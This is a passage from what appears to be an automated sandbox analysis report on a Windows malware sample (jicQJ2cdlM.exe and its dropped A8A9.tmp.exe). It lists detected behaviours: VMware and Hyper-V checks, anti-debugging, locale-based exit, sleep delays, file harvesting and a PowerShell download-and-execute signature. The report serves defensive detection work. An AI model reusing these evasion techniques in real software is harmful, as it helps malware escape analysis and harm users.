                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02E0B7EB push 7DD07DC0h; iretd 1_2_02E0B7FC
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02E0E7CA push eax; ret 1_2_02E0E7D9
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02E0E7BB push eax; ret 1_2_02E0E7D9
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02E0ACE5 pushfd ; iretd 1_2_02E0ACE8
                    Source: jicQJ2cdlM.exeStatic PE information: section name: .text entropy: 7.652676977218571
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.4826108141905285
                    Source: A8A9.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.4826108141905285
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeFile created: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeJump to dropped file
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0040E999 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E999
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking locale)
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_1-26313
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeWindow / User API: threadDelayed 359Jump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeWindow / User API: threadDelayed 9631Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeEvaded block: after key decisiongraph_1-27474
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-64166
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeAPI coverage: 5.1 %
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeAPI coverage: 6.5 %
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe TID: 7388Thread sleep count: 359 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe TID: 7388Thread sleep time: -255249s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe TID: 7388Thread sleep count: 9631 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe TID: 7388Thread sleep time: -6847641s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040E430
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_004138B0
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,1_2_00414570
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00414910
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_0040ED20
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040BE70
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040DE10
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004016D0
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040DA80
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,1_2_00413EA0
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040F6B0
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_02D1E697
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D247D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_02D247D7
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,1_2_02D1EF87
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D24B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_02D24B77
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D23B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_02D23B17
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_02D1C0D7
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_02D1DCE7
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_02D1E077
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_02D1F917
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D24107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_02D24107
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D11937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_02D11937
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00401160 GetSystemInfo,ExitProcess,1_2_00401160
                    Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000886000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000886000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
                    Source: Amcache.hve.4.drBinary or memory string: VMware
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareF
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000886000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000886000.00000004.00000020.00020000.00000000.sdmp, A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E39000.00000004.00000020.00020000.00000000.sdmp, A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E87000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E33000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000859000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.000000000085A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26319
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26298
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26301
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26140
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26312
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26185
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-27711
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeAPI call chain: ExitProcess graph end nodegraph_1-26341
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_004045C0 VirtualProtect ?,00000004,00000100,000000001_2_004045C0
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC7E
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0042FE7F mov eax, dword ptr fs:[00000030h]0_2_0042FE7F
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_007F9B2B push dword ptr fs:[00000030h]0_2_007F9B2B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A100E6 mov eax, dword ptr fs:[00000030h]0_2_00A100E6
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009E092B mov eax, dword ptr fs:[00000030h]0_2_009E092B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009E0D90 mov eax, dword ptr fs:[00000030h]0_2_009E0D90
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00419750 mov eax, dword ptr fs:[00000030h]1_2_00419750
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D10D90 mov eax, dword ptr fs:[00000030h]1_2_02D10D90
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D299B7 mov eax, dword ptr fs:[00000030h]1_2_02D299B7
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D1092B mov eax, dword ptr fs:[00000030h]1_2_02D1092B
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02E09ABB push dword ptr fs:[00000030h]1_2_02E09ABB
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0043BBE1 GetProcessHeap,0_2_0043BBE1
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0042A3F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A3F3
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_004104F3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004104F3
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00410686 SetUnhandledExceptionFilter,0_2_00410686
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0040F936 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040F936
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_00A0A65A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A0A65A
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009F075A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_009F075A
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009F08ED SetUnhandledExceptionFilter,0_2_009F08ED
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_009EFB9D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_009EFB9D
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0041AD48
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0041CEEA SetUnhandledExceptionFilter,1_2_0041CEEA
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0041B33A
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D2AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_02D2AFAF
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D2B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_02D2B5A1
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D2D151 SetUnhandledExceptionFilter,1_2_02D2D151
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Yara detected Powershell download and execute
                    Source: Yara matchFile source: Process Memory Space: A8A9.tmp.exe PID: 7404, type: MEMORYSTR
                    Searches for specific processes (likely to inject)
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00419600
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exeCode function: 1_2_02D29867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_02D29867
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeProcess created: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe "C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: 0_2_0041079B cpuid 0_2_0041079B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0043B02A
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: GetLocaleInfoW,0_2_004351E0
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: EnumSystemLocalesW,0_2_0043B2ED
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: EnumSystemLocalesW,0_2_0043B2A2
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: EnumSystemLocalesW,0_2_0043B388
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B415
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: GetLocaleInfoW,0_2_0043B665
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0043B78E
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: GetLocaleInfoW,0_2_0043B895
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0043B962
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: EnumSystemLocalesW,0_2_00434DED
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exeCode function: EnumSystemLocalesW,0_2_00A15054
